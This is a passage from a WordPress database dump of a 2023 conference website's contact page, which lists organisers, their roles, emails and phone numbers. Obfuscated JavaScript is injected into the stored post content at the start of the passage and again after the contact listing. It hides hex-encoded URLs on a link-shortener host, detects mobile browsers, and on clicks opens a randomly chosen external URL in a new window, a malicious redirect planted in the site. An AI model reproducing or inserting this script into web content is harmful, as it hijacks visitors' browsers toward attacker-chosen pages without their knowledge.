_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-28 09:32:47','2023-06-28 09:32:47','',4823,'https://gsw2023.com/?p=4949',0,'revision','',0),
(4950,4,'2023-06-28 09:35:00','2023-06-28 09:35:00','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944848383{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 